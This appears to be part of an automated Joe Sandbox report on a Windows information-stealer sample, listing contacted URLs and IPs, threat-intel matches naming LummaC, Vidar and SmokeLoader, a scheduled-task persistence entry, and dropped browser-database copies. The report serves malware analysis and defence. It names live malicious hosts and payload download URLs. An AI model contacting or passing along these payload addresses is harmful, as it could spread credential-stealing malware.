                  • URL Reputation: safe
                  		unknown
                  https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000001.00000000.1721748248.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://steamcommunity.com/workshop/katB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.0000000000976000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://login.steampowered.com/katB4C0.tmp, 0000000B.00000003.2317523394.0000000000983000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://steamcommunity.com/profiles/76561199689717899/badgeskatB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.0000000000976000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://support.mozilla.org/products/firefoxgro.all38F9.exe, 00000006.00000003.2069016777.0000000002D94000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://store.steampowered.com/legal/katB4C0.tmp, 0000000B.00000002.2791549428.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2399303935.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2658098297.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2352036330.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2367775910.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.0000000000976000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svgexplorer.exe, 00000001.00000000.1721748248.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-darkexplorer.exe, 00000001.00000000.1721748248.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-Aexplorer.exe, 00000001.00000000.1721748248.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1721748248.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://65.109.242.5976561199689717899[1].htm.11.drfalse
                  • Avira URL Cloud: safe
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  23.199.218.33
                  		steamcommunity.comUnited States
                  		16625AKAMAI-ASUStrue
                  23.145.40.124
                  		unknownReserved
                  		22631SURFAIRWIRELESS-IN-01UStrue
                  188.114.96.3
                  		whispedwoodmoodsksl.shopEuropean Union
                  		13335CLOUDFLARENETUStrue
                  185.18.245.58
                  		dbfhns.inAzerbaijan
                  		39232UNINETAZtrue
                  185.235.137.54
                  		unknownIran (ISLAMIC Republic Of)
                  		202391AFRARASAIRfalse
                  65.109.242.59
                  		unknownUnited States
                  		11022ALABANZA-BALTUSfalse
                  91.202.233.231
                  		unknownRussian Federation
                  		9009M247GBtrue
                  31.176.197.47
                  		unknownBosnia and Herzegowina
                  		9146BIHNETBIHNETAutonomusSystemBAtrue
                  45.129.96.86
                  		unknownEstonia
                  		208440GMHOST-EEtrue

                  General Information

                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1447652
                  Start date and time:2024-05-26 10:27:05 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 12m 35s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:16
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:1
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:2.exe
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@15/35@6/9
                  EGA Information:
                  • Successful, ratio: 80%
                  HCA Information:
                  • Successful, ratio: 96%
                  • Number of executed functions: 65
                  • Number of non-executed functions: 243
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                  Warnings

                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                  • Excluded IPs from analysis (whitelisted): 20.189.173.21
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target katB4C0.tmp, PID 4480 because there are no executed function
                  • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • Not all processes where analyzed, report is missing behavior information
                  • Report creation exceeded maximum time and may have missing disassembly code information.
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Report size getting too big, too many NtEnumerateKey calls found.
                  • Report size getting too big, too many NtOpenFile calls found.
                  • Report size getting too big, too many NtOpenKey calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  04:28:18API Interceptor408558x Sleep call for process: explorer.exe modified
                  04:28:30API Interceptor9x Sleep call for process: 38F9.exe modified
                  04:29:03API Interceptor1x Sleep call for process: WerFault.exe modified
                  04:29:09API Interceptor1x Sleep call for process: katB4C0.tmp modified
                  09:28:20Task SchedulerRun new task: Firefox Default Browser Agent A5AFD9FBF82960E4 path: C:\Users\user\AppData\Roaming\jssrvvh

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  23.199.218.33http://surl.pk/rUrcXGet hashmaliciousUnknownBrowse
                    SecuriteInfo.com.Win32.Malware-gen.198.6512.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                      http://steamcommunici.com/profiles/76567410475250301Get hashmaliciousUnknownBrowse
                        https://mobile-sides-vertical-2.xv2.us/Get hashmaliciousUnknownBrowse
                          https://steam.poweredcommunityart.com/artwork/?id=8513444218Get hashmaliciousUnknownBrowse
                            file.exeGet hashmaliciousCryptOne, VidarBrowse
                              23.145.40.1244.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                              • 23.145.40.124/pintxi1lv.exe
                              188.114.96.3http://worker-quiet-cherry-3fda.cbb2856.workers.dev/favicon.icoGet hashmaliciousHTMLPhisherBrowse
                              • worker-quiet-cherry-3fda.cbb2856.workers.dev/favicon.ico
                              SecuriteInfo.com.Win64.Evo-gen.30302.14698.exeGet hashmaliciousCryptOne, Djvu, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLineBrowse
                              • fleur-de-lis.sbs/jhgfd
                              KT-L068310.exeGet hashmaliciousFormBookBrowse
                              • www.barrettdigitalart.com/i319/
                              http://cfg3xe.pages.dev/Get hashmaliciousUnknownBrowse
                              • cfg3xe.pages.dev/
                              http://amht38eh3e3f98ox0ld1rc4h3fjcowz98ldjp5hek8.pages.dev/Get hashmaliciousUnknownBrowse
                              • amht38eh3e3f98ox0ld1rc4h3fjcowz98ldjp5hek8.pages.dev/
                              G5N0mtxJLN.exeGet hashmaliciousLokibotBrowse
                              • rocheholding.top/evie3/five/fre.php
                              Purchase Order # PO-00159.xla.xlsxGet hashmaliciousUnknownBrowse
                              • qr-in.com/YXcuqXy
                              LHER000698175.xlsGet hashmaliciousUnknownBrowse
                              • qr-in.com/JeYCrvM
                              QUOTATION_MAYQTRA031244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • filetransfer.io/data-package/sy8hP76i/download
                              Purchase Order # PO-00159.xla.xlsxGet hashmaliciousUnknownBrowse
                              • qr-in.com/YXcuqXy
                              185.18.245.584.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                              • dbfhns.in/tmp/index.php
                              file.exeGet hashmaliciousBabuk, Djvu, SmokeLoaderBrowse
                              • sdfjhuz.com/dl/buildz.exe

                              Domains

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              whispedwoodmoodsksl.shop4.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                              • 188.114.96.3
                              a6lzHWp4pa.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                              • 104.21.77.72
                              2WG7HEj7mc.exeGet hashmaliciousLummaCBrowse
                              • 188.114.96.3
                              TrBsSxexUi.exeGet hashmaliciousLummaCBrowse
                              • 188.114.96.3
                              JuqFxYIfSi.exeGet hashmaliciousLummaCBrowse
                              • 188.114.96.3
                              91trXZr1Ts.exeGet hashmaliciousLummaCBrowse
                              • 104.21.77.72
                              j6W8OF1uLO.exeGet hashmaliciousLummaCBrowse
                              • 104.21.77.72
                              0CmMweT4Wf.exeGet hashmaliciousLummaCBrowse
                              • 172.67.205.94
                              TePd86X60h.exeGet hashmaliciousLummaCBrowse
                              • 104.21.77.72
                              jHLijDfFFA.exeGet hashmaliciousLummaCBrowse
                              • 172.67.205.94
                              steamcommunity.com4.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                              • 104.102.42.29
                              file.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, SmokeLoader, VidarBrowse
                              • 104.102.42.29
                              file.exeGet hashmaliciousVidarBrowse
                              • 104.102.42.29
                              jE4zclRJU2.exeGet hashmaliciousVidarBrowse
                              • 23.210.122.61
                              https://bitly.cx/LmuIzGet hashmaliciousUnknownBrowse
                              • 104.102.42.29
                              https://steamcomnumitly.com/get/spring/afaFJ4a/50Get hashmaliciousUnknownBrowse
                              • 23.67.133.187
                              file.exeGet hashmaliciousVidarBrowse
                              • 104.102.42.29
                              mQPyKe8cqn.exeGet hashmaliciousVidarBrowse
                              • 104.102.42.29
                              file.exeGet hashmaliciousVidarBrowse
                              • 104.102.42.29
                              SecuriteInfo.com.Win64.Evo-gen.30302.14698.exeGet hashmaliciousCryptOne, Djvu, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLineBrowse
                              • 23.67.133.187
                              dbfhns.in4.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                              • 190.28.110.209

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              AKAMAI-ASUS4.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                              • 104.102.42.29
                              hgVOQGUGqk.elfGet hashmaliciousUnknownBrowse
                              • 104.71.4.13
                              mKBZo65Fcb.elfGet hashmaliciousMiraiBrowse
                              • 23.216.221.197
                              c0jeXEeVbR.elfGet hashmaliciousMiraiBrowse
                              • 23.48.239.166
                              http://surl.pk/rUrcXGet hashmaliciousUnknownBrowse
                              • 2.19.126.198
                              file.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, SmokeLoader, VidarBrowse
                              • 104.102.42.29
                              la.bot.mips.elfGet hashmaliciousUnknownBrowse
                              • 23.36.242.165
                              file.exeGet hashmaliciousVidarBrowse
                              • 104.102.42.29
                              CHA0VZiz8y.exeGet hashmaliciousCryptOne, Djvu, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, VidarBrowse
                              • 104.102.42.29
                              jE4zclRJU2.exeGet hashmaliciousVidarBrowse
                              • 23.210.122.61
                              CLOUDFLARENETUS4.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                              • 188.114.96.3
                              QN5PrDr5St.elfGet hashmaliciousUnknownBrowse
                              • 8.6.157.57
                              boost.exeGet hashmaliciousNovaSentinelBrowse
                              • 104.21.55.141
                              SecuriteInfo.com.decompression.bomb.26030.10641.exeGet hashmaliciousUnknownBrowse
                              • 188.114.96.3
                              SecuriteInfo.com.decompression.bomb.26030.10641.exeGet hashmaliciousUnknownBrowse
                              • 104.21.46.8
                              wtrD6RiHlm.exeGet hashmaliciousRedLineBrowse
                              • 172.67.19.24
                              n4WgIM7VfS.elfGet hashmaliciousMiraiBrowse
                              • 1.8.124.113
                              https://newsklikdisini5bekbg0.3bsz4.xyz/Get hashmaliciousUnknownBrowse
                              • 188.114.96.3
                              http://surl.pk/rUrcXGet hashmaliciousUnknownBrowse
                              • 188.114.96.3
                              https://steamcomunmnity.com/app/1648413/STALKER_2_Heert_of_ChornobylGet hashmaliciousUnknownBrowse
                              • 188.114.96.3
                              UNINETAZ4.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                              • 185.18.245.58
                              http://www.lnkfi.re/1moJNQoc/Get hashmaliciousUnknownBrowse
                              • 37.27.108.55
                              1.exeGet hashmaliciousPureLog StealerBrowse
                              • 185.18.245.58
                              file.exeGet hashmaliciousBabuk, Djvu, SmokeLoaderBrowse
                              • 185.18.245.58
                              CGemi3cruu.elfGet hashmaliciousMiraiBrowse
                              • 37.26.35.135
                              ODggSYsZP2.elfGet hashmaliciousUnknownBrowse
                              • 37.27.14.174
                              240506-b7lv1sfmcw_pw_infected.zipGet hashmaliciousXmrigBrowse
                              • 37.27.107.122
                              0dN59ZIkEM.exeGet hashmaliciousVidarBrowse
                              • 37.27.87.155
                              file.exeGet hashmaliciousLummaC, PureLog Stealer, RedLine, RisePro Stealer, Vidar, zgRATBrowse
                              • 37.27.87.155
                              file.exeGet hashmaliciousVidarBrowse
                              • 37.27.87.155
                              SURFAIRWIRELESS-IN-01US4.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                              • 23.145.40.124
                              jew.x86.elfGet hashmaliciousMiraiBrowse
                              • 23.145.58.16
                              4glhPVAaxw.exeGet hashmaliciousUnknownBrowse
                              • 23.145.40.122
                              4glhPVAaxw.exeGet hashmaliciousUnknownBrowse
                              • 23.145.40.122
                              wsWcTw2vNt.elfGet hashmaliciousMiraiBrowse
                              • 23.145.34.49
                              q3K2TwLiUh.elfGet hashmaliciousMiraiBrowse
                              • 23.145.34.37
                              WYA25FYPq8.elfGet hashmaliciousMiraiBrowse
                              • 23.145.34.36
                              DUGEn9I0cO.elfGet hashmaliciousMiraiBrowse
                              • 23.145.34.35
                              RQbg1N3Jd5.elfGet hashmaliciousMiraiBrowse
                              • 23.145.34.54
                              bjSUNxvdgR.elfGet hashmaliciousMiraiBrowse
                              • 23.145.58.62

                              JA3 Fingerprints

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              a0e9f5d64349fb13191bc781f81f42e14.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                              • 188.114.96.3
                              file.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, SmokeLoader, VidarBrowse
                              • 188.114.96.3
                              YvF8xPbiml.exeGet hashmaliciousRisePro StealerBrowse
                              • 188.114.96.3
                              swift.xlsGet hashmaliciousUnknownBrowse
                              • 188.114.96.3
                              NFs_468.msiGet hashmaliciousVMdetectBrowse
                              • 188.114.96.3
                              XVM5nluelx.exeGet hashmaliciousBabuk, Djvu, SmokeLoaderBrowse
                              • 188.114.96.3
                              https://proviaproducts-my.sharepoint.com/:b:/g/personal/bob_rossi_provia_com/EadoUKaCx_pLpRRZlPhQBbkBX2-aayjJ2XxHM4MjJFfXkA?e=7rg6fPGet hashmaliciousUnknownBrowse
                              • 188.114.96.3
                              file.exeGet hashmaliciousBabuk, Djvu, SmokeLoaderBrowse
                              • 188.114.96.3
                              Updated-IT1_Individual_Resident_Return_XLS-18.0.9-2024.xls.xlsGet hashmaliciousUnknownBrowse
                              • 188.114.96.3
                              SecuriteInfo.com.Win64.Evo-gen.30302.14698.exeGet hashmaliciousCryptOne, Djvu, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLineBrowse
                              • 188.114.96.3
                              51c64c77e60f3980eea90869b68c58a84.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                              • 65.109.242.59
                              file.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, SmokeLoader, VidarBrowse
                              • 65.109.242.59
                              file.exeGet hashmaliciousVidarBrowse
                              • 65.109.242.59
                              jE4zclRJU2.exeGet hashmaliciousVidarBrowse
                              • 65.109.242.59
                              file.exeGet hashmaliciousVidarBrowse
                              • 65.109.242.59
                              file.exeGet hashmaliciousVidarBrowse
                              • 65.109.242.59
                              SecuriteInfo.com.Win64.Evo-gen.30302.14698.exeGet hashmaliciousCryptOne, Djvu, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLineBrowse
                              • 65.109.242.59
                              SecuriteInfo.com.Win32.Malware-gen.198.6512.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                              • 65.109.242.59
                              BI6oo9z4In.exeGet hashmaliciousCryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                              • 65.109.242.59
                              file.exeGet hashmaliciousVidarBrowse
                              • 65.109.242.59
                              37f463bf4616ecd445d4a1937da06e194.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                              • 23.199.218.33
                              file.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, SmokeLoader, VidarBrowse
                              • 23.199.218.33
                              SecuriteInfo.com.Trojan.Win32.Scar.tbxu.16998.26344.exeGet hashmaliciousUnknownBrowse
                              • 23.199.218.33
                              SecuriteInfo.com.Trojan.Win32.Scar.tbxu.16998.26344.exeGet hashmaliciousUnknownBrowse
                              • 23.199.218.33
                              file.exeGet hashmaliciousVidarBrowse
                              • 23.199.218.33
                              jE4zclRJU2.exeGet hashmaliciousVidarBrowse
                              • 23.199.218.33
                              file.exeGet hashmaliciousVidarBrowse
                              • 23.199.218.33
                              mQPyKe8cqn.exeGet hashmaliciousVidarBrowse
                              • 23.199.218.33
                              SecuriteInfo.com.Win32.Malware-gen.16925.17124.dllGet hashmaliciousUnknownBrowse
                              • 23.199.218.33
                              SecuriteInfo.com.Win32.Malware-gen.16925.17124.dllGet hashmaliciousUnknownBrowse
                              • 23.199.218.33

                              Dropped Files

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              C:\ProgramData\FIEGCBKEGCFC\freebl3.dll4.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                file.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, SmokeLoader, VidarBrowse
                                  file.exeGet hashmaliciousVidarBrowse
                                    CHA0VZiz8y.exeGet hashmaliciousCryptOne, Djvu, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, VidarBrowse
                                      jE4zclRJU2.exeGet hashmaliciousVidarBrowse
                                        file.exeGet hashmaliciousVidarBrowse
                                          file.exeGet hashmaliciousVidarBrowse
                                            SecuriteInfo.com.Win64.Evo-gen.30302.14698.exeGet hashmaliciousCryptOne, Djvu, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLineBrowse
                                              SecuriteInfo.com.Win32.Malware-gen.198.6512.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                                BI6oo9z4In.exeGet hashmaliciousCryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                                  C:\ProgramData\FIEGCBKEGCFC\mozglue.dll4.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                                    file.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, SmokeLoader, VidarBrowse
                                                      file.exeGet hashmaliciousVidarBrowse
                                                        CHA0VZiz8y.exeGet hashmaliciousCryptOne, Djvu, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, VidarBrowse
                                                          jE4zclRJU2.exeGet hashmaliciousVidarBrowse
                                                            file.exeGet hashmaliciousVidarBrowse
                                                              file.exeGet hashmaliciousVidarBrowse
                                                                SecuriteInfo.com.Win64.Evo-gen.30302.14698.exeGet hashmaliciousCryptOne, Djvu, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLineBrowse
                                                                  SecuriteInfo.com.Win32.Malware-gen.198.6512.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                                                    BI6oo9z4In.exeGet hashmaliciousCryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse

                                                                      Created / dropped Files

                                                                      C:\ProgramData\FIEGCBKEGCFC\AAAAKJ

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Local\Temp\katB4C0.tmp
                                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                      Category:dropped
                                                                      Size (bytes):98304
                                                                      Entropy (8bit):0.08235737944063153
                                                                      Encrypted:false
                                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                      Malicious:false
                                                                      Reputation:high, very likely benign file
                                                                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\ProgramData\FIEGCBKEGCFC\AAAAKJ-shm

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Local\Temp\katB4C0.tmp
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):32768
                                                                      Entropy (8bit):0.017262956703125623
                                                                      Encrypted:false
                                                                      SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                      MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                      SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                      SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                      SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                      Malicious:false
                                                                      Reputation:high, very likely benign file
                                                                      Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\ProgramData\FIEGCBKEGCFC\BAKEBA

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Local\Temp\katB4C0.tmp
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                      Category:dropped
                                                                      Size (bytes):49152
                                                                      Entropy (8bit):0.8180424350137764
                                                                      Encrypted:false
                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\ProgramData\FIEGCBKEGCFC\DAEBKK

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Local\Temp\katB4C0.tmp
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                      Category:dropped
                                                                      Size (bytes):106496
                                                                      Entropy (8bit):1.1358696453229276
                                                                      Encrypted:false
                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\ProgramData\FIEGCBKEGCFC\DAKJDH

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Local\Temp\katB4C0.tmp
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                      Category:dropped
                                                                      Size (bytes):40960
                                                                      Entropy (8bit):0.8553638852307782
                                                                      Encrypted:false
                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\ProgramData\FIEGCBKEGCFC\DHDHCG

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Local\Temp\katB4C0.tmp
                                                                      File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                      Category:dropped
                                                                      Size (bytes):5242880
                                                                      Entropy (8bit):0.037963276276857943
                                                                      Encrypted:false
                                                                      SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                      MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                      SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                      SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                      SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                      Malicious:false
